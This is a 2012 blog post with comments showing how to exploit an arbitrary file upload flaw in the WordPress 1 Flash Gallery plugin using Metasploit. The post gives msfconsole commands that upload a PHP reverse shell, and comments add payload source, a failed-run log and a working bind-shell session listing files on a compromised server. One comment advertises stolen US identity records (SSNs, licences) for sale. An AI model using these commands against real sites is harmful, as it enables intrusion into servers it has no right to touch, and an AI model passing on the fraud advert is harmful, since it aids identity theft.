Friday, 1 June 2012
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.
Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy to /pentest/exploits/framework3/modules/exploits/multi/http
Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained on my video.
msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit
And that's it, thank you guys for watching it.
Subscribe to:
Post Comments (Atom)
hi bro airwolf reverse shell public?
ReplyDeletesenme plz link
airwolf_reverse shell link plz bro
ReplyDeleteI'm trying to start exploit but it output the next error
ReplyDeletemsf exploit(flash_galery_wordpress) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at ...
[-] Exploit exception: can't convert nil into String
[*] Exploit completed, but no session was created.
msf exploit(flash_galery_wordpress) >
Please tell me whats wrong?
What is the payload you are trying to use?
ReplyDeletehi Angelo one question.
ReplyDeleteYou was modify the payloads reverse_php.rb in /../payloads/singles/php but you was copy/paste in this file the exploit in this line
shell=<<-END_OF_PHP_CODE
END_OF_PHP_CODE
but the modified code is different from what I see...
i show you my code
def php_reverse_shell
if (!datastore['LHOST'] or datastore['LHOST'].empty?)
# datastore is empty on msfconsole startup
ipaddr = '127.0.0.1'
port = 4444
else
ipaddr = datastore['LHOST']
port = datastore['LPORT']
end
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
uri = "tcp://#{ipaddr}"
socket_family = "AF_INET"
if Rex::Socket.is_ipv6?(ipaddr)
uri = "tcp://[#{ipaddr}]"
socket_family = "AF_INET6"
end
shell=<<-END_OF_PHP_CODE
-----------------o----------------
your code does not show this in the beginning
show us your code
thx
Metasploit upgraded those payloads, but they still don't work.
ReplyDeleteI just tested now and you can use this payload php/meterpreter/bind_tcp
Once you get your meterpreter session just type "shell" then hit enter, you will get your shell.
EX:
meterpreter > shell
Process 15882 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
ls
20111011082340.php
the flash gallery is nice
ReplyDeleteas you are dealing in hacking you must see this too...
http://born2hack.hpage.com/top-10-ethical-hackers-of-india_18213017.html
awesome post buddy
ReplyDeleteindias best hackers
Hello Everyone !
ReplyDeleteUSA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.
All SSN's are Tested & Verified.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers
->Hope for the long term business
->You can buy for your specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040